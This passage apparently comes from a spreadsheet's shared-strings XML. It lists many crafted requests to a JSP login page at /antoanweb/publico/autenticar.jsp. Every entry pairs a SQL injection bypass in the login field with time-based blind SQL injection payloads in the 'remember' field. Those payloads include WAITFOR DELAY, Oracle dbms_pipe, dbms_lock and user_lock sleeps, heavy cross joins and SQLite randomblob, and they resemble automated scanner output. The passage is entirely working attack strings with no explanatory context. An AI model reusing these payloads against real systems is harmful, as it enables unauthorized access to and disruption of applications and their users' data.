    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');waitfordelay'0:0:5';--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';waitfordelay'0:0:5';--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";waitfordelay'0:0:5';--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);waitfordelay'0:0:5';--and(7421=7421&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));waitfordelay'0:0:5';--and((938=938&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));waitfordelay'0:0:5';--and(((793=793&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;waitfordelay'0:0:5';--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');waitfordelay'0:0:5';--and('gtgc'='gtgc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));waitfordelay'0:0:5';--and(('nhnj'='nhnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));waitfordelay'0:0:5';--and((('cjwv'='cjwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';waitfordelay'0:0:5';--and'szjo'='szjo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');waitfordelay'0:0:5';--and('llju'like'llju&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));waitfordelay'0:0:5';--and(('sjae'like'sjae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));waitfordelay'0:0:5';--and((('utfa'like'utfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';waitfordelay'0:0:5';--and'fjwx'like'fjwx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");waitfordelay'0:0:5';--and("upni"="upni&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));waitfordelay'0:0:5';--and(("ddjq"="ddjq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));waitfordelay'0:0:5';--and((("wsbn"="wsbn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";waitfordelay'0:0:5';--and"knim"="knim&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");waitfordelay'0:0:5';--and("nciy"like"nciy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));waitfordelay'0:0:5';--and(("uivv"like"uivv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));waitfordelay'0:0:5';--and((("zbnw"like"zbnw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";waitfordelay'0:0:5';--and"fbme"like"fbme&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and(57=57&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and((4243=4243&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and(((5703=5703&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and('jevk'='jevk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and(('avdn'='avdn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and((('voll'='voll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and'qdji'='qdji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and('hwca'like'hwca&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and(('ksyx'like'ksyx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and((('nbaq'like'nbaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and'yhcp'like'yhcp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and("hnnq"="hnnq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and(("iwcz"="iwcz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and((("jcyl"="jcyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and"wdtj"="wdtj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and("zicy"like"zicy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and(("akrk"like"akrk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and((("dqvu"like"dqvu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectdbms_pipe.receive_message(chr(67)||chr(101)||chr(72)||chr(105),5)fromdual;--and"jwjc"like"jwjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(3520=3520&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((1167=1167&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(((7849=7849&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and('ihse'='ihse&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(('hqsq'='hqsq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((('esqs'='esqs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and'xiyk'='xiyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and('tfvj'like'tfvj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(('kovl'like'kovl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((('zxrx'like'zxrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and'ftff'like'ftff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and("dcnl"="dcnl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(("fmxh"="fmxh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((("ygpj"="ygpj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and"aojj"="aojj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and("ihuj"like"ihuj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(("hbpe"like"hbpe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((("nbsz"like"nbsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and"nhjn"like"nhjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);begindbms_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');begindbms_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';begindbms_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";begindbms_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);begindbms_lock.sleep(5);end;--and(6978=6978&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));begindbms_lock.sleep(5);end;--and((2665=2665&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));begindbms_lock.sleep(5);end;--and(((3543=3543&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;begindbms_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');begindbms_lock.sleep(5);end;--and('eynb'='eynb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));begindbms_lock.sleep(5);end;--and(('bmmj'='bmmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));begindbms_lock.sleep(5);end;--and((('svzx'='svzx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';begindbms_lock.sleep(5);end;--and'rxtd'='rxtd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');begindbms_lock.sleep(5);end;--and('sbqg'like'sbqg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));begindbms_lock.sleep(5);end;--and(('vmfl'like'vmfl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));begindbms_lock.sleep(5);end;--and((('kvnp'like'kvnp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';begindbms_lock.sleep(5);end;--and'fuml'like'fuml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");begindbms_lock.sleep(5);end;--and("qbjl"="qbjl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));begindbms_lock.sleep(5);end;--and(("beiw"="beiw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));begindbms_lock.sleep(5);end;--and((("vqub"="vqub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";begindbms_lock.sleep(5);end;--and"scrv"="scrv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");begindbms_lock.sleep(5);end;--and("bgkd"like"bgkd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));begindbms_lock.sleep(5);end;--and(("gqux"like"gqux&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));begindbms_lock.sleep(5);end;--and((("uyxf"like"uyxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";begindbms_lock.sleep(5);end;--and"ecsd"like"ecsd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);beginuser_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');beginuser_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';beginuser_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";beginuser_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);beginuser_lock.sleep(5);end;--and(5074=5074&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));beginuser_lock.sleep(5);end;--and((9485=9485&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));beginuser_lock.sleep(5);end;--and(((9339=9339&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;beginuser_lock.sleep(5);end;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');beginuser_lock.sleep(5);end;--and('zmaw'='zmaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));beginuser_lock.sleep(5);end;--and(('pgud'='pgud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));beginuser_lock.sleep(5);end;--and((('tcho'='tcho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';beginuser_lock.sleep(5);end;--and'djek'='djek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');beginuser_lock.sleep(5);end;--and('hime'like'hime&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));beginuser_lock.sleep(5);end;--and(('ckwt'like'ckwt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));beginuser_lock.sleep(5);end;--and((('cyqf'like'cyqf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';beginuser_lock.sleep(5);end;--and'bcch'like'bcch&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");beginuser_lock.sleep(5);end;--and("idur"="idur&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));beginuser_lock.sleep(5);end;--and(("lyhu"="lyhu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));beginuser_lock.sleep(5);end;--and((("kwta"="kwta&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";beginuser_lock.sleep(5);end;--and"ekdo"="ekdo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");beginuser_lock.sleep(5);end;--and("yqpj"like"yqpj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));beginuser_lock.sleep(5);end;--and(("ppsv"like"ppsv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));beginuser_lock.sleep(5);end;--and((("hmix"like"hmix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";beginuser_lock.sleep(5);end;--and"pfnm"like"pfnm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(215=215&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((5434=5434&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(((6744=6744&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and('vohs'='vohs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(('wlda'='wlda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((('sbmr'='sbmr&amp;modo=entrar</t>
  </si>
  <si>
